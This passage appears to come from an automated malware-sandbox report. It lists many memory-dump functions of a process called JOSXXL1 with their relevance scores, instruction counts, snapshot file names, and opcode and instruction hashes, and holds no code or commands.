                                                                                                        • Opcode Fuzzy Hash: fd847eda2f636b0b33864ed2f28ce8c3f78270d30333ea5c4fd7c2d588d9a34d
                                                                                                        • Instruction Fuzzy Hash: 23D19D78E01218CFDB55DFA9C990B9DBBB2AF89300F1080A9D809BB365DB359D85CF51
                                                                                                        Function 3A7FD710 Relevance: .7, Instructions: 745COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee446e502f7ff04b04f4d45c0e7e9e1597451e47282edbff347ea367f7c6e3d5
                                                                                                        • Instruction ID: 8100c6fd56dddb9b2072055c551ac367686ff3ef29baaa4db49a1b52e1365043
                                                                                                        • Opcode Fuzzy Hash: ee446e502f7ff04b04f4d45c0e7e9e1597451e47282edbff347ea367f7c6e3d5
                                                                                                        • Instruction Fuzzy Hash: 62825C74E012288FDB65DF69C994BDDBBB2BB89301F1081EAA40DA7365DB315E85CF40
                                                                                                        Function 3A7FEE48 Relevance: .7, Instructions: 677COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0294d8130d01e2c1be054cefcbc4a2e91747231b94d6b3b9bf0d7d629915338
                                                                                                        • Instruction ID: 43b912cbf6d8fec0f23ab16922ef04ab995aa766c8406af50c90c03ae6b2d8ce
                                                                                                        • Opcode Fuzzy Hash: f0294d8130d01e2c1be054cefcbc4a2e91747231b94d6b3b9bf0d7d629915338
                                                                                                        • Instruction Fuzzy Hash: 9D727F74E012288FDB65DF69C994BDEBBB2BF89300F1081EA940DA7265DB315E85CF41
                                                                                                        Function 39699548 Relevance: .4, Instructions: 357COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a2d8490b2086077b0c6e90ca0d918a4f9cfeca604cf7a90ed1afab05a3c26d98
                                                                                                        • Instruction ID: 1e5ac4d41ce881633d2c989bf14eee75ea9c72d919b25768ebc4813f29fc244e
                                                                                                        • Opcode Fuzzy Hash: a2d8490b2086077b0c6e90ca0d918a4f9cfeca604cf7a90ed1afab05a3c26d98
                                                                                                        • Instruction Fuzzy Hash: 45F1D274E11218CFDB14DFA9D984B9DBBB2BF88304F5081A9E808AB355DB74AD85CF50
                                                                                                        Function 39D77B78 Relevance: .3, Instructions: 296COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 972b9bc1d96a6ba180a4e76d776246ab7c3e45212b892fd063b4aeb08bb0908f
                                                                                                        • Instruction ID: 61852e76a770c65776e0eab9bf1dd862cae706fb47f3e993ab73d9c7fa69098c
                                                                                                        • Opcode Fuzzy Hash: 972b9bc1d96a6ba180a4e76d776246ab7c3e45212b892fd063b4aeb08bb0908f
                                                                                                        • Instruction Fuzzy Hash: 68E1AF74E01218CFEB54DFA5C984B9DBBB2BF89304F2081A9D408BB395DB755A85CF50
                                                                                                        Function 3A801CF0 Relevance: .3, Instructions: 292COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 98f137fce002a970e25490b1cbaf90ea9b34a7dc80b7a0a640fed1c6a697661b
                                                                                                        • Instruction ID: 4633e897b2fbd58d16f576d89f235a60438fa4586923f0dab1ddfff662ed84fc
                                                                                                        • Opcode Fuzzy Hash: 98f137fce002a970e25490b1cbaf90ea9b34a7dc80b7a0a640fed1c6a697661b
                                                                                                        • Instruction Fuzzy Hash: 8ED18D74E01218CFDB54DFA5C994B9DBBB2BF89300F6081A9D809AB364DB359E85CF50
                                                                                                        Function 3A7C6678 Relevance: .3, Instructions: 292COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aedf693c4ed518040962027f69ed99429b26997c6b9c4868f89e46ca5e245ff0
                                                                                                        • Instruction ID: 4cd533fef3a3c90d81dd5972830dacac61105b470b77948ddcd74690b00dd762
                                                                                                        • Opcode Fuzzy Hash: aedf693c4ed518040962027f69ed99429b26997c6b9c4868f89e46ca5e245ff0
                                                                                                        • Instruction Fuzzy Hash: A3D18E74E01218CFDB54DFA5C994B9DBBB2BF89300F2091A9D409AB364DB359E85CF50
                                                                                                        Function 39D76030 Relevance: .3, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6863e05ba340b20c6ed3b775afe6fe925e6ea693c828accb1b91f877c3a2de6a
                                                                                                        • Instruction ID: 40d6ff35f1885c4ce7bb2b06ed6986c830ffaf2a1041965de1af3f507b9b17a9
                                                                                                        • Opcode Fuzzy Hash: 6863e05ba340b20c6ed3b775afe6fe925e6ea693c828accb1b91f877c3a2de6a
                                                                                                        • Instruction Fuzzy Hash: 16C19F74E01218CFDB54DFA5C984B9DBBB2AF89300F6081A9D809BB365DB359E85CF50
                                                                                                        Function 39692968 Relevance: .3, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 651be892e0ef2d4cd6bda7a23d574cda93a933da7657b9e96ec9c0ff773ee421
                                                                                                        • Instruction ID: 22c911180226f5579731c8652d9d0cf9e7b4c53bf944b4c22229c4c5bfcc5111
                                                                                                        • Opcode Fuzzy Hash: 651be892e0ef2d4cd6bda7a23d574cda93a933da7657b9e96ec9c0ff773ee421
                                                                                                        • Instruction Fuzzy Hash: 7EC1A074E01218CFDB54DFA5C984B9DBBB2BF89301F2081A9D809A7365DB359E85CF50
                                                                                                        Function 3A843E60 Relevance: .3, Instructions: 251COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 20678137e88e05492173c4b4c1d39e496391010e28bdcbdbf4f623a9d24e04c5
                                                                                                        • Instruction ID: fb31c1390d79102abab83019b43f807bf039af53858a014f4e5189a88c11f1d3
                                                                                                        • Opcode Fuzzy Hash: 20678137e88e05492173c4b4c1d39e496391010e28bdcbdbf4f623a9d24e04c5
                                                                                                        • Instruction Fuzzy Hash: CF9146B5A04709CFEB14EFA0D9587AEBBB1FB46302F105469D101772E1CB788A49CFA5
                                                                                                        Function 3A843E70 Relevance: .2, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 19625e2423300f923cc87c81fdda874373203115be46e7351300eb60c20fcfd0
                                                                                                        • Instruction ID: ea75c31631b9e8946bb71cb69c2503365615882e7bf21608ac6eed64d183db12
                                                                                                        • Opcode Fuzzy Hash: 19625e2423300f923cc87c81fdda874373203115be46e7351300eb60c20fcfd0
                                                                                                        • Instruction Fuzzy Hash: F79146B5E04609CFEB14EFA0D9587AEBBB1FB46302F105429D101772E1CB788A49CFA5
                                                                                                        Function 39692DC8 Relevance: .2, Instructions: 220COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 73579ecdfc9ebfc30c0059aa6ac8d3fcce983e0f16671d994dc178babac8eaec
                                                                                                        • Instruction ID: af09179747508ec04a728b0b7636321ee1f982042fcebabbe9d96dfdaa242aab
                                                                                                        • Opcode Fuzzy Hash: 73579ecdfc9ebfc30c0059aa6ac8d3fcce983e0f16671d994dc178babac8eaec
                                                                                                        • Instruction Fuzzy Hash: 0EA10370E00208CFDB14DFA9C984BDDBBB1FF89304F209269E409A72A1DB74A985CF55
                                                                                                        Function 39691E80 Relevance: .2, Instructions: 220COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 533f0fbd61c3aa9cc458921e82dc58104da01ba0b75ac2a7428f3eafc33a97d6
                                                                                                        • Instruction ID: 4edaf6957bf33f29285c0503b14e2e75d8a831d69f126f06808315c096f96d7d
                                                                                                        • Opcode Fuzzy Hash: 533f0fbd61c3aa9cc458921e82dc58104da01ba0b75ac2a7428f3eafc33a97d6
                                                                                                        • Instruction Fuzzy Hash: FDA182B5E012198FEB68CF6AC944BDDFBF2BB89300F14C1AAD409A7254DB345A85CF51
                                                                                                        Function 39692DC2 Relevance: .2, Instructions: 219COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 226754638ca1d8a5e85afb7b241cc0a3880d4c552f326c5f381a5401d6711532
                                                                                                        • Instruction ID: 41615150d6f009e0bd8dd9322ebfc63f234d01a1ccec9deb374fe527b28a6ed4
                                                                                                        • Opcode Fuzzy Hash: 226754638ca1d8a5e85afb7b241cc0a3880d4c552f326c5f381a5401d6711532
                                                                                                        • Instruction Fuzzy Hash: BCA1F474E002088FDB14DFA9C984BDDBBB1FF89304F209269E409A72A1DB749985CF55
                                                                                                        Function 396917A0 Relevance: .2, Instructions: 219COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40fffb1a3d12cd64e49865851f5dcf35862bcc4b5803908b552465219b409bbe
                                                                                                        • Instruction ID: dffabc546e68fb844c08aa807db19eb90c6eb914eeebc3485ea3d7229b3bd275
                                                                                                        • Opcode Fuzzy Hash: 40fffb1a3d12cd64e49865851f5dcf35862bcc4b5803908b552465219b409bbe
                                                                                                        • Instruction Fuzzy Hash: 1DA183B5E012198FEB64DF6AC944BDEBBF2BF89300F14C1AAD408A7254DB345A85CF51
                                                                                                        Function 3969310E Relevance: .2, Instructions: 202COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: da72b85192608b8d4454da08cb93f988f80afff3d1c2b10d9e9c239b83bf91f1
                                                                                                        • Instruction ID: eadb0b78633a01119f04a1d192391208d31673a415b693fcd052f649dc0060e5
                                                                                                        • Opcode Fuzzy Hash: da72b85192608b8d4454da08cb93f988f80afff3d1c2b10d9e9c239b83bf91f1
                                                                                                        • Instruction Fuzzy Hash: DF91E374A01208CFEB10DFA8C984BDDBBB1FF89314F209269E409B72A1DB759985CF55
                                                                                                        Function 3A80FB30 Relevance: .2, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 82d8837216a25df4ffafad341884886f7b265ae34365781faaf156956d3f0dc6
                                                                                                        • Instruction ID: 5d5110f3479aa9e066a6f82986a67463ed304fe0404a3653d0de9287ac550b22
                                                                                                        • Opcode Fuzzy Hash: 82d8837216a25df4ffafad341884886f7b265ae34365781faaf156956d3f0dc6
                                                                                                        • Instruction Fuzzy Hash: 90819E74E01218DFDB14DFE9C990ADDBBB2BB89300F209169D815BB368DB359946CF50
                                                                                                        Function 3A808470 Relevance: .2, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f2a0f3b62550ea5d0b7f15f9d6242f9ef135c6132699d02d25c1fab0936c8204
                                                                                                        • Instruction ID: b757846d767b645e56a7025a8a905a2e5c396e6fa7b1e98e6fb6f97e387d2ed2
                                                                                                        • Opcode Fuzzy Hash: f2a0f3b62550ea5d0b7f15f9d6242f9ef135c6132699d02d25c1fab0936c8204
                                                                                                        • Instruction Fuzzy Hash: D8819E74E01218CFDB14DFE9C990ADDBBB2BB89300F20956AD415BB368DB359986CF50
                                                                                                        Function 3A7F70C0 Relevance: .2, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9252fa1f15e20f9fb2322a376284b4eabfa58cce8c1235468ee1958b26cea332
                                                                                                        • Instruction ID: 6c3e55b2fb27beaa420469bfd84057aff2c5783ba09a048ff470c4a4d91735f3
                                                                                                        • Opcode Fuzzy Hash: 9252fa1f15e20f9fb2322a376284b4eabfa58cce8c1235468ee1958b26cea332
                                                                                                        • Instruction Fuzzy Hash: BE81AE74E01218CFDB14DFA9C980ADDBBB2BF89300F209569D815BB368EB359946CF50
                                                                                                        Function 3969FC68 Relevance: .2, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fec676789bf011712b06a97736f37bc48894256e3a118c3ef8ca7858fe135d05
                                                                                                        • Instruction ID: e296c055e24b1eada4c3d13b4926b87b08611079c82dcebbaf45e5c44db0fdc2
                                                                                                        • Opcode Fuzzy Hash: fec676789bf011712b06a97736f37bc48894256e3a118c3ef8ca7858fe135d05
                                                                                                        • Instruction Fuzzy Hash: 9D81BD74E11218CFDB04DFA9D980ADDBBB2BF89300F209169E804BB368DB359946CF50
                                                                                                        Function 3969178F Relevance: .2, Instructions: 166COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dfb226eb1bc0ce346cb3db4c65d9e26014ef15185bad59f61d51b98e51d373e9
                                                                                                        • Instruction ID: 206a1f5f02931797e3044bfb0aa2416afd21cc7756b37c6347fedc0f59ee6eca
                                                                                                        • Opcode Fuzzy Hash: dfb226eb1bc0ce346cb3db4c65d9e26014ef15185bad59f61d51b98e51d373e9
                                                                                                        • Instruction Fuzzy Hash: 0F7195B5D016188FEB68CF6AC944BDEBBF2AF88300F14C1AAD409A7254DB745A85CF11
                                                                                                        Function 3A7C6568 Relevance: .2, Instructions: 152COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5f55e8d56699510bb16dc2cf006621c3658e219709596d65a49a26d607d1deb3
                                                                                                        • Instruction ID: 409d73eacc0fb99685498e2e50d2ea37aa25aa5151220a27437c5ebf14a8de67
                                                                                                        • Opcode Fuzzy Hash: 5f55e8d56699510bb16dc2cf006621c3658e219709596d65a49a26d607d1deb3
                                                                                                        • Instruction Fuzzy Hash: 4B518B70D082488BDB25CFAAD8D42DDBBB2BF89300F54D1AAC414BB256EB359946CF50
                                                                                                        Function 0015E97C Relevance: .1, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc8c999f40ca2724169d62c8daf80f74ec24ca047bc57ec46c73e02a5709fc93
                                                                                                        • Instruction ID: 0e07886836b13c1f1496f2593a8b538e3533358ad148515c63dfab8be08a1d71
                                                                                                        • Opcode Fuzzy Hash: dc8c999f40ca2724169d62c8daf80f74ec24ca047bc57ec46c73e02a5709fc93
                                                                                                        • Instruction Fuzzy Hash: A551B574E00208DFDB19DFBAD584A9DBBB2BF89301F249029E815AB364DB355945CF14
                                                                                                        Function 0015E988 Relevance: .1, Instructions: 147COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2dcd399fcc100d5737fb897ca428137ab09e3aed69b84204b86561a96980d597
                                                                                                        • Instruction ID: a0915718d3b9f834f9acf1cf839ce79be45326bf432b999f0ee31ada0fc01126
                                                                                                        • Opcode Fuzzy Hash: 2dcd399fcc100d5737fb897ca428137ab09e3aed69b84204b86561a96980d597
                                                                                                        • Instruction Fuzzy Hash: 7E51A474E00208DFDB18DFAAD584A9DBBF2BF88300F249029E819BB364DB319945CF54
                                                                                                        Function 3A7C6621 Relevance: .1, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 418010bd53e0f2b78ece935d455dbf12c6e18f2d805d7648c9bb10f85d695b1a
                                                                                                        • Instruction ID: d33ad5fec2a4525a5a24c21c7d557aea6f39ac9f7b792f1017596289dc239a58
                                                                                                        • Opcode Fuzzy Hash: 418010bd53e0f2b78ece935d455dbf12c6e18f2d805d7648c9bb10f85d695b1a
                                                                                                        • Instruction Fuzzy Hash: 9E517B71D053498FDB24CFAAD8942CDBBB2BF8A300F50E1A9C014BB215EB35A945CF90
                                                                                                        Function 3A7C660F Relevance: .1, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c233111f48a03c8e6a404a0af7cd27e827e5779ad0db569df7083c208337f39f
                                                                                                        • Instruction ID: 84d7f44f09c51fa9d163eba1e1b36bd218116339ceeedffd697b6796b3033363
                                                                                                        • Opcode Fuzzy Hash: c233111f48a03c8e6a404a0af7cd27e827e5779ad0db569df7083c208337f39f
                                                                                                        • Instruction Fuzzy Hash: 4C413974D053588BDB24CFAAD9942DDBBB2BF8A300F54E069D419BB265EB385909CF40
                                                                                                        Function 39691E70 Relevance: .1, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 10de0bb3afecfb38bc29af639921605a02d1c243fac997709d11e89ab91bb1f2
                                                                                                        • Instruction ID: 06f1847a08f702333ff569f8308f8260c121659e0a05f370c72b88d9a28cd187
                                                                                                        • Opcode Fuzzy Hash: 10de0bb3afecfb38bc29af639921605a02d1c243fac997709d11e89ab91bb1f2
                                                                                                        • Instruction Fuzzy Hash: C04169B1E016198BEB58CF6BC9447DEFAF3AFC9300F54C1AAC40DA6264DB740A858F51
                                                                                                        Function 3A7C56A8 Relevance: .1, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0aada69af4055582ce0c0ddbd06bc4bbf6271e9000a0c076da5bd0f13360498f
                                                                                                        • Instruction ID: 00b7d313e94698e243b8caf5fa5822f46f7e006beb571436d4e148234e9f4d92
                                                                                                        • Opcode Fuzzy Hash: 0aada69af4055582ce0c0ddbd06bc4bbf6271e9000a0c076da5bd0f13360498f
                                                                                                        • Instruction Fuzzy Hash: F941F574E00248CFEB48CFAAD8806DEFBB2AF89300F10D12AD409BB254EB755946CF54
                                                                                                        Function 3A801CE0 Relevance: .1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a7ba76b42a6703097a680db4c1fac9c42a8a49a9dc25922fb93f7360d9025a3
                                                                                                        • Instruction ID: fc26c604a9c3b233ea9892a81d4fb73c39eddfb6cf9d78a0d69e66b914c65b5a
                                                                                                        • Opcode Fuzzy Hash: 2a7ba76b42a6703097a680db4c1fac9c42a8a49a9dc25922fb93f7360d9025a3
                                                                                                        • Instruction Fuzzy Hash: A341F2B0E052189FDB18DFAAD8546DDBBF2BF89300F14D06AD418BB264EB745946CF44
                                                                                                        Function 001576F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
